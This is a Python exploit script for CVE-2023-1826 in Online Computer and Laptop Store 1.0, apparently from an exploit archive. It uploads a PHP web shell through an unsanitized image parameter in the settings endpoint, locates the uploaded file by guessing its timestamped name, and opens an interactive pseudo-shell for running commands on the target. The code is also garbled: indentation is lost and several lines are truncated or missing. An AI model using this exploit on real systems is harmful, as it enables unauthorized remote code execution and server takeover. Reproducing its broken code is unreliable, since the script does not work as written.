#!/usr/bin/env python3  
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)  
# Date: 09/04/2023  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: Debian 11.6  
# CVE : CVE-2023-1826  
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.  
import requests  
from argparse import ArgumentParser  
from uuid import uuid4  
from datetime import datetime, timezone  
def interactiveShell(fileUrl: str):  
print("Entering pseudo-shell. Type 'exit' to quit")  
while True:  
command = input("\n$ ")  
if command == "exit":  
response = requests.get(f"{fileUrl}?cmd={command}")  
def uploadFile(url: str, filename: str, content):  
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"  
file = {"img": (filename, content)}  
response =, files=file)  
return response  
def getUploadedFileUrl(url: str, filename: str):  
timeNow = # UTC time, rounded to minutes  
epoch = int(timeNow.timestamp()) # Time in milliseconds  
possibleFilename = f"{epoch}_{filename}"  
fileUrl = f"{url}/uploads/{possibleFilename}"  
response = requests.get(fileUrl)  
if response.status_code == 200:  
return fileUrl  
def exploit(url: str):  
filename = str(uuid4()) + ".php"  
content = "<?php system($_GET['cmd'])?>"  
response = uploadFile(url, filename, content)  
if response.status_code != 200:  
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")  
uploadedUrl = getUploadedFileUrl(url, filename)  
if uploadedUrl == None:  
print("Error. Could not find the uploaded file.")  
print(f"Uploaded file is at {uploadedUrl}")  
except KeyboardInterrupt:  
def getWebsiteURL(url: str):  
if not url.startswith("http"):  
url = "http://" + url  
if url.endswith("/"):  
url = url[:-1]  
return url  
def main():  
parser = ArgumentParser(description="Exploit for CVE-2023-1826")  
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")  
args = parser.parse_args()  
url = getWebsiteURL(args.url)  
if __name__ == "__main__":